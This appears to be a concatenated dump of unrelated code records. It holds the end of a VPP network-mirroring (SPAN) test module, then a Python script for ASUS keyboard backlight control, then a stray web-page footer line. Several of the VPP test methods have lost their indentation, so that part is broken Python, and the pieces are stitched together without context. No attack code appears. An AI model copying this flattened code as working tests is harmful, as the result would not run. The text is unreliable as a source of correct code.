        # Create incoming packet streams for packet-generator interfaces
        pkts = self.create_stream(
            self.pg0, self.pg_if_packet_sizes, do_dot1=True)
        self.pg0.add_stream(pkts)
        # Enable SPAN on pg0 sub if (mirrored to gre sub if)
        self.vapi.sw_interface_span_enable_disable(
            self.sub_if.sw_if_index, gre_sub_if.sw_if_index, is_l2=1)
        # Enable packet capturing and start packet sending
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        # Strip GRE and the dot1q 500 tag pushed by the VTR rewrite.
        n_pkts = len(pkts)
        pg1_pkts = self.pg1.get_capture(n_pkts)
        pg2_pkts = self.pg2.get_capture(n_pkts)
        def decap(p): return self.remove_tags(
            self.decap_gre(p), [Tag(dot1=DOT1Q, vlan=500)])
        pg2_decaped = [decap(p) for p in pg2_pkts]
        self.bridge(gre_sub_if.sw_if_index, is_add=0)
        # Disable SPAN on pg0 sub if
        self.vapi.sw_interface_span_enable_disable(
            self.sub_if.sw_if_index, gre_sub_if.sw_if_index, state=0, is_l2=1)
        gre_if.remove_vpp_config()
        self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=0)
        self.verify_capture(pg1_pkts, pg2_decaped)
    def test_span_l2_rx_dst_1q_vtr(self):
        """ SPAN l2 rx mirror into 1q subif+vtr

        Mirror destination is the pg2 dot1q sub-interface whose VTR
        rewrite pushes tag 300; the tag is removed before comparison.
        """
        self.sub_if.admin_up()
        self.vlan_sub_if.admin_up()
        self.bridge(self.vlan_sub_if.sw_if_index)
        # Create bi-directional cross-connects between pg0 and pg1
        self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=1)
        # Create incoming packet streams for packet-generator interfaces
        pkts = self.create_stream(
            self.pg0, self.pg_if_packet_sizes, do_dot1=True)
        self.pg0.add_stream(pkts)
        self.vapi.sw_interface_span_enable_disable(
            self.sub_if.sw_if_index, self.vlan_sub_if.sw_if_index, is_l2=1)
        # Enable packet capturing and start packet sending
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        # Strip the dot1q 300 tag pushed by the VTR rewrite.
        n_pkts = len(pkts)
        pg1_pkts = self.pg1.get_capture(n_pkts)
        pg2_pkts = self.pg2.get_capture(n_pkts)
        pg2_untagged = [self.remove_tags(p, [Tag(dot1=DOT1Q, vlan=300)])
                        for p in pg2_pkts]
        self.bridge(self.vlan_sub_if.sw_if_index, is_add=0)
        # Disable SPAN on pg0 sub if (mirrored to vlan sub if)
        self.vapi.sw_interface_span_enable_disable(
            self.sub_if.sw_if_index, self.vlan_sub_if.sw_if_index, state=0,
            is_l2=1)
        self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=0)
        self.verify_capture(pg1_pkts, pg2_untagged)
    def test_span_l2_rx_dst_1ad_vtr(self):
        """ SPAN l2 rx mirror into 1ad subif+vtr

        Mirror destination is the pg2 QinQ sub-interface whose VTR
        rewrite pushes 1ad 400 + 1q 500; both tags are removed before
        comparison.
        """
        self.sub_if.admin_up()
        self.qinq_sub_if.admin_up()
        self.bridge(self.qinq_sub_if.sw_if_index)
        # Create bi-directional cross-connects between pg0 and pg1
        self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=1)
        # Create incoming packet streams for packet-generator interfaces
        pkts = self.create_stream(
            self.pg0, self.pg_if_packet_sizes, do_dot1=True)
        self.pg0.add_stream(pkts)
        self.vapi.sw_interface_span_enable_disable(
            self.sub_if.sw_if_index, self.qinq_sub_if.sw_if_index, is_l2=1)
        # Enable packet capturing and start packet sending
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        # Strip both tags pushed by the QinQ VTR rewrite (outer first).
        n_pkts = len(pkts)
        pg1_pkts = self.pg1.get_capture(n_pkts)
        pg2_pkts = self.pg2.get_capture(n_pkts)
        pg2_untagged = [self.remove_tags(p, [Tag(dot1=DOT1AD, vlan=400),
                                             Tag(dot1=DOT1Q, vlan=500)])
                        for p in pg2_pkts]
        self.bridge(self.qinq_sub_if.sw_if_index, is_add=0)
        # Disable SPAN on pg0 sub if (mirrored to qinq sub if)
        self.vapi.sw_interface_span_enable_disable(
            self.sub_if.sw_if_index, self.qinq_sub_if.sw_if_index, state=0,
            is_l2=1)
        self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=0)
        self.verify_capture(pg1_pkts, pg2_untagged)
def test_l2_tx_span(self):
""" SPAN l2 tx mirror """
self.sub_if.admin_up()
self.bridge(self.pg2.sw_if_index)
# Create bi-directional cross-connects between pg0 and pg1
self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index)
# Create incoming packet streams for packet-generator interfaces
pkts = self.create_stream(
self.pg0, self.pg_if_packet_sizes, do_dot1=True)
self.pg0.add_stream(pkts)
# Enable SPAN on pg1 (mirrored to pg2)
self.vapi.sw_interface_span_enable_disable(
self.pg1.sw_if_index, self.pg2.sw_if_index, is_l2=1, state=2)
self.logger.info(self.vapi.ppcli("show interface span"))
# Enable packet capturing and start packet sending
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
# Verify packets outgoing packet streams on mirrored interface (pg2)
n_pkts = len(pkts)
pg1_pkts = self.pg1.get_capture(n_pkts)
pg2_pkts = self.pg2.get_capture(n_pkts)
self.bridge(self.pg2.sw_if_index, is_add=0)
# Disable SPAN on pg0 (mirrored to pg2)
self.vapi.sw_interface_span_enable_disable(
self.pg1.sw_if_index, self.pg2.sw_if_index, state=0, is_l2=1)
self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=0)
self.verify_capture(pg1_pkts, pg2_pkts)
def test_l2_rx_tx_span(self):
""" SPAN l2 rx tx mirror """
self.sub_if.admin_up()
self.bridge(self.pg2.sw_if_index)
# Create bi-directional cross-connects between pg0 and pg1
self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index)
# Create incoming packet streams for packet-generator interfaces
pg0_pkts = self.create_stream(
self.pg0, self.pg_if_packet_sizes, do_dot1=True)
self.pg0.add_stream(pg0_pkts)
pg1_pkts = self.create_stream(
self.pg1, self.pg_if_packet_sizes, do_dot1=False)
self.pg1.add_stream(pg1_pkts)
# Enable SPAN on pg0 (mirrored to pg2)
self.vapi.sw_interface_span_enable_disable(
self.sub_if.sw_if_index, self.pg2.sw_if_index, is_l2=1, state=3)
self.logger.info(self.vapi.ppcli("show interface span"))
# Enable packet capturing and start packet sending
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
# Verify packets outgoing packet streams on mirrored interface (pg2)
pg0_expected = len(pg1_pkts)
pg1_expected = len(pg0_pkts)
pg2_expected = pg0_expected + pg1_expected
pg0_pkts = self.pg0.get_capture(pg0_expected)
pg1_pkts = self.pg1.get_capture(pg1_expected)
pg2_pkts = self.pg2.get_capture(pg2_expected)
self.bridge(self.pg2.sw_if_index, is_add=0)
# Disable SPAN on pg0 (mirrored to pg2)
self.vapi.sw_interface_span_enable_disable(
self.sub_if.sw_if_index, self.pg2.sw_if_index, state=0, is_l2=1)
self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=0)
self.verify_capture(pg0_pkts + pg1_pkts, pg2_pkts)
def test_l2_bcast_mirror(self):
""" SPAN l2 broadcast mirror """
self.sub_if.admin_up()
self.bridge(self.pg2.sw_if_index)
# Create bi-directional cross-connects between pg0 and pg1
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.sub_if.sw_if_index, bd_id=99, enable=1)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.pg1.sw_if_index, bd_id=99, enable=1)
# Create incoming packet streams for packet-generator interfaces
pg0_pkts = self.create_stream(
self.pg0, self.pg_if_packet_sizes, do_dot1=True, bcast=True)
self.pg0.add_stream(pg0_pkts)
pg1_pkts = self.create_stream(
self.pg1, self.pg_if_packet_sizes, do_dot1=False, bcast=True)
self.pg1.add_stream(pg1_pkts)
# Enable SPAN on pg0 (mirrored to pg2)
self.vapi.sw_interface_span_enable_disable(
self.sub_if.sw_if_index, self.pg2.sw_if_index, is_l2=1, state=3)
self.logger.info(self.vapi.ppcli("show interface span"))
# Enable packet capturing and start packet sending
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
# Verify packets outgoing packet streams on mirrored interface (pg2)
pg0_expected = len(pg1_pkts)
pg1_expected = len(pg0_pkts)
pg2_expected = pg0_expected + pg1_expected
pg0_pkts = self.pg0.get_capture(pg0_expected)
pg1_pkts = self.pg1.get_capture(pg1_expected)
pg2_pkts = self.pg2.get_capture(pg2_expected)
self.bridge(self.pg2.sw_if_index, is_add=0)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.sub_if.sw_if_index, bd_id=99, enable=0)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.pg1.sw_if_index, bd_id=99, enable=0)
# Disable SPAN on pg0 (mirrored to pg2)
self.vapi.sw_interface_span_enable_disable(
self.sub_if.sw_if_index, self.pg2.sw_if_index, state=0, is_l2=1)
self.verify_capture(pg0_pkts + pg1_pkts, pg2_pkts)
# Allow running this test module directly; VppTestRunner hooks the
# tests into VPP's test harness.
if __name__ == '__main__':
    unittest.main(testRunner=VppTestRunner)
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
"""Adds the keyboard backlight support for ASUS laptops."""
__version__ = "0.1"
__author__ = "Fabien Loison"
__copyright__ = "Copyright © 2010 Fabien LOISON"
__website__ = "https://github.com/flozz/asus-keyboard-backlight"
import os
import sys
#Export the DISPLAY variable if it is not already set.
if "DISPLAY" not in os.environ:
    DISPLAY = False
    #os.environ assignment (rather than os.putenv) also updates the
    #in-process mapping, so later lookups in this process see the value.
    os.environ["DISPLAY"] = ":0.0"
    #Hack to retrieve the X session cookie of the user.
    #Only works for those that use GDM. May not work if there is
    #more than one user cookie in the folder (gdm excluded).
    if os.path.isdir("/var/run/gdm/"):
        try:
            xcookie_dirs = os.listdir("/var/run/gdm/")
        except OSError:
            pass
        else:
            for xcookie_dir in xcookie_dirs:
                if xcookie_dir[:9] == "auth-for-" and xcookie_dir[9:12] != "gdm":
                    os.environ["XAUTHORITY"] = \
                            "/var/run/gdm/%s/database" % xcookie_dir
                    DISPLAY = True
                    break
else:
    DISPLAY = True
#Desktop notifications are only attempted when a display is available
#and pynotify is installed.
if DISPLAY:
    try:
        import pynotify
        NOTIFY = True
    except ImportError:
        NOTIFY = False
else:
    NOTIFY = False
#sysfs entries exposed by the asus_laptop kernel module.
MAX_BRIGHTNESS_FILE = "/sys/devices/platform/asus_laptop/leds/asus::kbd_backlight/max_brightness"
BRIGHTNESS_FILE = "/sys/devices/platform/asus_laptop/leds/asus::kbd_backlight/brightness"
#Backup file used to restore the brightness across reboots.
BRIGHTNESS_BAK_FILE = "/var/lib/asus-kbd-backlight/brightness"
BRIGHTNESS_BAK_DIR = "/var/lib/asus-kbd-backlight/"
#Fallback values, refreshed by get_max_brightness()/get_brightness().
MAX_BRIGHTNESS = 3
BRIGHTNESS = 1
#Icon names ordered from full brightness (index 0) down to off.
BRIGHTNESS_ICONS = [
    "notification-keyboard-brightness-full",
    "notification-keyboard-brightness-high",
    "notification-keyboard-brightness-medium",
    "notification-keyboard-brightness-low",
    "notification-keyboard-brightness-off",
]
def get_max_brightness(path=None):
    """Get the max brightness.

    Reads the maximum backlight level from sysfs and stores it in the
    MAX_BRIGHTNESS global. Keeps the previous value when the file is
    missing, unreadable or does not contain a number.

    Argument:
      * path -- optional path of the sysfs file to read (defaults to
        MAX_BRIGHTNESS_FILE)
    """
    global MAX_BRIGHTNESS
    if path is None:
        path = MAX_BRIGHTNESS_FILE
    if not os.path.isfile(path):
        return
    #Read file (always close the handle, even if read() fails)
    try:
        file_ = open(path, "r")
        try:
            raw = file_.read()
        finally:
            file_.close()
    except IOError:
        return
    #Extract info
    value = raw.strip()
    if value.isdigit():
        max_brightness = int(value)
        #NOTE(review): values >= 128 appear to carry a driver flag bit
        #that must be masked off -- TODO confirm against asus_laptop.
        if max_brightness >= 128:
            max_brightness = max_brightness - 128
        MAX_BRIGHTNESS = max_brightness
def get_brightness(path=None):
    """Get the current brightness.

    Reads the current backlight level from sysfs and stores it in the
    BRIGHTNESS global. Keeps the previous value when the file is
    missing, unreadable or holds an out-of-range value.

    Argument:
      * path -- optional path of the sysfs file to read (defaults to
        BRIGHTNESS_FILE)
    """
    global BRIGHTNESS
    if path is None:
        path = BRIGHTNESS_FILE
    if not os.path.isfile(path):
        return
    #Read file (always close the handle, even if read() fails)
    try:
        file_ = open(path, "r")
        try:
            raw = file_.read()
        finally:
            file_.close()
    except IOError:
        return
    #Extract info
    value = raw.strip()
    if value.isdigit():
        brightness = int(value)
        if 0 <= brightness <= MAX_BRIGHTNESS:
            BRIGHTNESS = brightness
        #NOTE(review): offset-by-128 values mirror get_max_brightness()
        #-- presumably the same driver flag bit; TODO confirm.
        elif 128 <= brightness <= MAX_BRIGHTNESS + 128:
            BRIGHTNESS = brightness - 128
def set_brightness(value, path=None, bak_path=None):
    """Set the brightness to <value>.

    Best effort: I/O errors are silently ignored so a missing sysfs
    entry or insufficient permissions never crash the key handler.

    Arguments:
      * value -- an integer number between 0 and MAX_BRIGHTNESS
      * path -- optional sysfs brightness file (defaults to
        BRIGHTNESS_FILE)
      * bak_path -- optional backup file used to restore the level at
        next boot (defaults to BRIGHTNESS_BAK_FILE)
    """
    if path is None:
        path = BRIGHTNESS_FILE
    if bak_path is None:
        bak_path = BRIGHTNESS_BAK_FILE
    #Set the brightness
    if os.path.isfile(path):
        _write_value(path, value)
    #Save the bak file (create its directory first if needed)
    bak_dir = os.path.dirname(bak_path)
    if bak_dir and not os.path.isdir(bak_dir):
        try:
            os.makedirs(bak_dir)
        except OSError:
            pass
    _write_value(bak_path, value)


def _write_value(path, value):
    """Best-effort write of str(value) to <path>; ignores I/O errors
    and always closes the file handle."""
    try:
        file_ = open(path, "w")
    except IOError:
        return
    try:
        file_.write(str(value))
    except IOError:
        pass
    finally:
        file_.close()
def notify():
    """Display an OSD showing the current brightness level."""
    #Set the icon: index 0 is "full", the last entry is "off".
    icon_index = int((MAX_BRIGHTNESS - BRIGHTNESS) *
                     (len(BRIGHTNESS_ICONS) - 1) // MAX_BRIGHTNESS)
    #Calculate the %. Floor division keeps the value an int on both
    #Python 2 and Python 3 (set_hint_int32 needs an integer).
    value = BRIGHTNESS * 100 // MAX_BRIGHTNESS
    #Notify
    notification = pynotify.Notification(
        "Brightness",
        "",
        BRIGHTNESS_ICONS[icon_index],
    )
    notification.set_hint_int32("value", value)
    #NOTE(review): this hint presumably makes notify-osd update the
    #existing bubble instead of stacking new ones -- confirm.
    notification.set_hint_string("x-canonical-private-synchronous", "")
    notification.show()
#Entry point: invoked as "<script> up" or "<script> down".
if len(sys.argv) == 2 and sys.argv[1] in ("up", "down"):
    #Read the current state from sysfs
    get_max_brightness()
    get_brightness()
    #Compute the new level, clamped to [0, MAX_BRIGHTNESS]
    if sys.argv[1] == "up":
        BRIGHTNESS = min(BRIGHTNESS + 1, MAX_BRIGHTNESS)
    else:
        BRIGHTNESS = max(BRIGHTNESS - 1, 0)
    #Apply and persist the new level
    set_brightness(BRIGHTNESS)
    #Show the OSD when notifications are available
    if NOTIFY:
        notify()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.